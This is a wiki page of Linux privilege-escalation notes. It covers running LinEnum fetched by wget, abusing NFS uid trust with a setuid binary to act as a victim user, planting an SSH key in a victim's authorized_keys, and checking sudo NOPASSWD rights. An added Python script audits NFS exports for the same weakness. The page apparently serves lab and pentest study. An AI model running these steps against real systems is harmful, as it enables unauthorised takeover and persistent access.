Linux escalate steps
lethanhtung01011980 edited this page Apr 23, 2020 · 19 revisions
- From nobody to user
- From User to root
Already have shell access
- https://github.com/rebootuser/LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t -r LinEnumRpt
Methods
- An attacker can act as a user with the same uid and gid as the victim user on the victim PC
- Via an NFS export with root_squash,no_all_squash
To use setuid to execute as a user
- Sample code https://github.com/lethanhtung01011980/Notes/blob/master/runAsOtherLinuxUser.c
- su - frank
- vim runAsOtherLinuxUser.c
- gcc runAsOtherLinuxUser.c -o runAsOtherLinuxUser
- chmod u+s runAsOtherLinuxUser
- On the victim PC, run ./runAsOtherLinuxUser
- We can edit /etc/passwd to change the uid and gid for a user
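The method above depends on an export that squashes root but still trusts whatever non-root uid/gid the client asserts. As an added example (not part of the original wiki page), this Python audit flags such entries in /etc/exports text; the sample exports content, the function name audit_exports and the issue labels are constructed for illustration, and quoted paths or "-options" default lists are assumed absent.

```python
import re

# Constructed sample /etc/exports content (not taken from the page).
SAMPLE_EXPORTS = """\
# constructed sample
/var/nfsshare  *(rw,sync,root_squash,no_all_squash)
/opt           10.0.0.0/24(ro,sync) backup01(rw,no_root_squash)
/srv/scratch   *(rw,sync,all_squash,anonuid=65534,anongid=65534)
/srv/krb       *.example.internal(rw,sec=krb5p)
"""

# Matches "client(opt,opt)" or a bare client name with default options.
CLIENT_RE = re.compile(r"([^\s()]*)\(([^)]*)\)|(\S+)")


def audit_exports(text):
    """Return (path, client, issue) tuples for exports that trust client ids."""
    findings = []
    # Join backslash-continued lines, then strip comments and blanks.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], parts[1] if len(parts) > 1 else ""
        for m in CLIENT_RE.finditer(rest):
            client = m.group(1) or m.group(3) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            # sec defaults to sys: uid/gid are whatever the client sends.
            sec = next((o[4:] for o in opts if o.startswith("sec=")), "sys")
            if "sys" not in sec.split(":"):
                continue  # Kerberos-only export: identities are authenticated
            if "no_root_squash" in opts:
                # Client root is treated as server root.
                findings.append((path, client, "no_root_squash"))
            if "rw" in opts and "all_squash" not in opts:
                # A client user with a matching uid can write files
                # (including setuid ones) as the server-side user.
                findings.append((path, client, "uid_trust"))
    return findings


if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(path, client, issue)
```

Entries reported as uid_trust are candidates for all_squash with a dedicated anonuid/anongid, or for a Kerberos sec= flavor.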
Try generating an SSH key to log in as a user
- root is the attacker user in Kali. frank is the victim user on the victim PC.
- On the attacker, run ssh-keygen to generate a private / public key pair with the file name id-frank.
- Copy the attacker's public key to the victim's /home/frank/.ssh/authorized_keys
- Attacker logs in as frank:
ssh -i /root/.ssh/id-frank frank@victim-ip
To check whether sudo can be run with "NOPASSWD", aka as root:
sudo -l
User frank may run the following commands on this host:
(frank) NOPASSWD: /opt/logreader/logreader.sh
(adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
If you see "Vim: Warning: Output is not to a terminal"
- Type ZQ
keybase-redirector PoE
- keybase-redirector PoE: https://hackerone.com/reports/426944
Or run LinEnum
- https://github.com/rebootuser/LinEnum
- wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t -r LinEnumRpt